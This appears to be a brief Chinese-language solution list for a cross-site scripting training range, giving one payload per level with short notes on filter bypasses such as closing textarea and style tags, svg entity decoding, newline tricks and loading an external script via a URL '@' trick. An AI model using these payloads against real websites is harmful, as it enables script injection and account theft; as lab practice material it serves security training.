靶场训练
0x00
<script>alert(1)</script>
0x01
</textarea><script>alert(1)</script><textarea>
0x02
"><script>alert(1)</script>
0x03
代替()
<script>alert`1`</script>
0x04
<svg>会将转义字符转换回来
<svg><script>alert(1)</script>
0x05
--!><script>alert(1)</script>
0x06
将输入框类型换为图片 放入错误src路径 通过换行绕过正则表达式
type="image" src="##" onerror
="alert(1)"
0x07
<body onload="alert(1)"
0x08
</style
><script>alert(1)</script>
0x09
先绕进if然后将script标签关闭 注释掉后面代码
https://www.segmentfault.com"></script><script>alert(1)</script> //
0x0A
更改src地址为个人地址
https://www.segmentfault.com@xss.js
0x12
\"+alert('1'))</script>\\